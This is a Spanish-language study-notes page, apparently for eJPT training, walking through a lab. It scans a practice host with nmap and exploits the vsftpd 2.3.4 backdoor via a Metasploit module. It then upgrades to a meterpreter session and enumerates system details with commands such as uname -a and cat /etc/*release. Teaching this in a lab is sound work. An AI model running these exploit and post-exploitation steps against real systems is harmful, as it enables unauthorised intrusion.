> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/enumeracion-de-linux/enumeracion-de-la-informacion-del-sistema-linux.md).

# Enumeración de la información del sistema - Linux

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/YaU1MXwXIel5UjTMYf9O" alt=""><figcaption></figcaption></figure>

**Paso 2:** Escaneo de puertos con Nmap

Realice un escaneo de puertos para identificar los servicios vulnerables que se ejecutan en el sistema objetivo. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
nmap -sV demo.ine.local
```

Como se muestra en la siguiente captura de pantalla, el análisis de Nmap revela que el objetivo tiene un servidor FTP ejecutándose en el puerto 21. La columna de versión del análisis de Nmap revela que el servidor FTP es vsftpd 2.3.4. Esta versión de vsftpd es vulnerable a una vulnerabilidad de ejecución de comandos de puerta trasera y puede explotarse con un módulo de Metasploit.

<figure><img src="/files/ApZbX0VsNAGHCeemNeDQ" alt=""><figcaption></figcaption></figure>

**Paso 3:** Obtener acceso.

Ahora que hemos identificado el servicio vulnerable que se ejecuta en el objetivo, podemos iniciar la consola de Metasploit Framework (msfconsole) y ejecutar el módulo de explotación ejecutando el siguiente comando:

**Dominio:**

```
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS demo.ine.local
exploit
id
```

**Nota:** Si el exploit no funcionó en el primer intento, ejecútelo nuevamente.

<figure><img src="/files/agRUWm3Uuj2gXibGrT5C" alt=""><figcaption></figcaption></figure>

También puede obtener una sesión de meterpreter en el sistema de destino actualizando la sesión del shell de comandos. Para ello, ejecute los siguientes comandos:

(Poner la sesión actual en segundo plano.)

**Comandos:**

```
CTRL + Z
sessions -u 1
sessions
sessions -i 2
```

<figure><img src="/files/F6gKePcTMCUjVsp82eDI" alt=""><figcaption></figcaption></figure>

**Paso 4:** Enumerar la información del sistema.

Ahora que hemos obtenido acceso al sistema de destino y hemos obtenido una sesión de meterpreter, podemos comenzar a enumerar la información del sistema local.

El primer dato que podemos enumerar es la distribución de Linux y la arquitectura del sistema operativo, esto se puede hacer ejecutando el siguiente comando meterpreter:

**Dominio:**

```
sysinfo
```

Como se muestra en la siguiente captura de pantalla, el comando muestra la distribución de Linux y la versión de lanzamiento, además de la arquitectura del sistema operativo.

<figure><img src="/files/DVl8m9QQkN2NOV8ytHWZ" alt=""><figcaption></figcaption></figure>

Podemos enumerar el nombre de host del sistema iniciando una sesión de shell y ejecutando los siguientes comandos:

**Comandos:**

```
shell
/bin/bash -i
hostname
```

<figure><img src="/files/k3ibpjwJ2WUlu1ZnEZEA" alt=""><figcaption></figcaption></figure>

También podemos identificar el nombre de la distribución de Linux y la versión de lanzamiento manualmente ejecutando los siguientes comandos:

**Comandos:**

```
cat /etc/issue
cat /etc/*release
```

<figure><img src="/files/NBnE5N2xkBHH2qtqwBMe" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, ahora hemos podido identificar de manera concluyente que el sistema de destino está ejecutando Debian 9 Stretch.

El siguiente dato que necesitaremos identificar es la versión del kernel de Linux que se ejecuta en el destino. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
uname -a
```

<figure><img src="/files/7LGwdoECWlgTF0d4kkEv" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, la versión del kernel de Linux que se ejecuta en el sistema de destino es 6.8.0-36-generic. Esta información es muy útil, ya que permite identificar vulnerabilidades de seguridad para esta versión específica del kernel de Linux, lo que permite elevar nuestros privilegios si es necesario.

Podemos identificar información de hardware sobre la CPU que se utiliza en el sistema de destino ejecutando el siguiente comando:

**Dominio:**

```
lscpu
```

<figure><img src="/files/eB0pYkiZaIaqNzBlbm3h" alt=""><figcaption></figcaption></figure>

Podemos ver la lista de dispositivos de almacenamiento conectados al sistema Linux e información sobre sus respectivos puntos de montaje y capacidad de almacenamiento ejecutando el siguiente comando:

**Dominio:**

```
df -h
```

<figure><img src="/files/pj7i4XVoRrWoxAfcEw2x" alt=""><figcaption></figcaption></figure>

#### Conclusión

En este laboratorio, aprendimos sobre el proceso de enumeración de información del sistema desde un sistema de destino que ejecuta Linux.
